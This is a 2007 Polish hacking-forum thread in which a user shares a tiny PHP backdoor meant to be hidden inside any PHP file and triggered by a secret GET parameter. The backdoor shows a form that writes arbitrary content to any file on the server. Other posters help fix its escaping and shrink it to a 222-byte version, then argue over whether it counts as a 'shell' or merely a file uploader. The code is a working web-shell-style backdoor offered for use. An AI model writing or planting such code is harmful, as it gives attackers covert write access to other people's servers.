Pokaż wyniki 1 do 8 z 8

Temat: Taki mały php shell ;)

  1. #1
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie Taki mały php shell ;)

    cze, zrobilem sobie shella, bardzo faniusi, mozna go bez przeszkod wstawic do kazdego pliku php i uaktywnic przez odpowiedniego GET'a np. "?1=1"

    Kod:
    <?
    if($_GET['1']==1){
    
    $a=trim($_POST['a']);
    $b=trim($_POST['b']);
    
    if(empty($a)and empty($b)){
    
    echo'
    <form action=""method="post">
    <input type="text"name="a">
    <textarea name="b"></textarea>
    <input type="submit"value=""></form>';}
    
    else{
    $x=fopen($a,"w+");
    fwrite($x,$b);
    fclose($x);
    }}?>
    271 bajtow

    Wszystko niby O.K, ale niestety... kiedy do tresci pliku wpisuje znaki specjalne ( " ' ) wykonuje sie kochane... addslashes() ( /" /' ) czy przyczyna jest to, ze musi sie tak stac, zeby skrypt ten mogl sie bez bledow sie wykonac i przypisac do zmiennej taki ciag znakow? czy moze powod lezy gdzie indziej, jest na to jakas rada?
    http://gogulas.yoyo.pl/h.gif

  2. #2
    Zarejestrowany
    May 2007
    Skąd
    Kraków
    Postów
    371

    Domyślnie

    jeżeli cie dobrze zrozumialem, to nie chcesz, zeby dodawal \ przez kazdym 'wymyslnym' znaczkiem?
    poprawiony kod...
    Kod:
    <?
    if($_GET['1']==1){
    
    $a=trim($_POST['a']);
    $b=trim($_POST['b']);
    
    if(empty($a)and empty($b)){
    
    echo'
    <form action=""method="post">
    <input type="text"name="a">
    <textarea name="b"></textarea>
    <input type="submit"value=""></form>';}
    
    else{
    $x=fopen($a,"w+");
    fwrite($x,stripslashes($b));
    fclose($x);
    }}?>
    PS: to nie shell tylko plikomodyfikator...

  3. #3
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Dzieki za rozwiazanie, temat prosze zamknac lub usunac, wedle uznania.
    Przyczyna tych addslashow byly oczywicie ustawienie serwera doh

    p.s
    coraz bardziej mnie to kreci, chyba w najblizszym czasie skupie sie na pechapechowaniu

    /edit
    To na koniec jeszcze finalna, 222 bajtowa wersja!
    Tyle ze tutaj wzialem przegladarke i serwer troszke ladne oczy, "przypadkowo" zapomianjac o cudzyslowiach itp., ale wszystko dziala
    Kod:
    <?
    
    if($_GET[1]==1)
    
    {$a=trim($_POST[a]);
    $b=trim($_POST[b]);
    
    if(empty($a))
    
    {echo'
    <form method=post>
    <input type=text name=a>
    <textarea name=b></textarea>
    <input type=submit>';
    
    }else
    {$x=fopen($a,"w+");
    fwrite($x,stripslashes($b));
    
    }}?>
    Nano shell :P
    Ostatnio edytowane przez gogulas : 11-03-2007 - 04:09
    http://gogulas.yoyo.pl/h.gif

  4. #4
    Avatar Nikow
    Nikow jest offline -=[ZRP]=-
    Zarejestrowany
    Sep 2007
    Skąd
    Różne zakątki sieci.
    Postów
    995

    Domyślnie

    Ale to nie jest shell...
    Cytat Napisał wikipedia.org
    Konto shell (lub konto shellowe, z ang. shell account) jest to konto w wieloużytkownikowym systemie operacyjnym przeważnie z rodziny Unixów (np. Linux, FreeBSD, Solaris) pozwalające na dostęp do usług terminalowych świadczonych przez serwer.
    Gdzie tutaj masz usługi terminalowe? Ja tutaj tylko wiedze modyfikowanie plików.

  5. #5
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    nie taki shell.....
    chodzi o skrypt(y) php ktory bedzie mial podobne mozliowsci jak ftp... do zarzadzania kontem www....
    Ostatnio edytowane przez gogulas : 11-03-2007 - 14:14
    http://gogulas.yoyo.pl/h.gif

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    to z shell'em to nie ma nic wspolnego - to raczej prosty uploader do plikow tekstowych...
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    omawiany byl na forum c99 tez do uploadowania plikow, nazywane jet to shellem.... chodziac z ogolnie rozumiana definicja tego slowa nie ma wiele wspolnego

    /edit
    Wy wiecie o co mi chodzi, ja wiem o co wam chodzi, po co te przepychanki o nazewnictwo? :P
    Ostatnio edytowane przez gogulas : 11-03-2007 - 14:29
    http://gogulas.yoyo.pl/h.gif

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Po to aby pozniej jakis niekumaty tluman nie przyszedl i powiedzial ze pisze shell'a do wysylania zamowien z formularza na maila... 'bo to tez mozna nazwac shellem, niommm'

    Zwrocilem na to uwage bo dla mnie shell to shell - wykonanie polecenia a nie zapisywanie contentu z requesta do pliku. Jedno to shell a drugie to uploader/edytor (chocby nawet bardzo ograniczony).
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Podobne wątki

  1. darmowy shell
    By 31337 in forum Domeny/Serwery
    Odpowiedzi: 4
    Autor: 01-25-2008, 15:29
  2. Shell
    By hakeritoo in forum Hacking
    Odpowiedzi: 4
    Autor: 07-05-2007, 20:17
  3. Konto Shell
    By xienonster in forum Domeny/Serwery
    Odpowiedzi: 7
    Autor: 06-08-2007, 21:40
  4. Forum-Czy da sie zrobic taki myk?
    By Niebieski in forum Newbie - dla początkujących!
    Odpowiedzi: 1
    Autor: 04-23-2007, 23:30
  5. Pomocy! Jaki To program? Czy taki istnieje?
    By hakierek18 in forum Hacking
    Odpowiedzi: 5
    Autor: 12-14-2006, 21:49

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj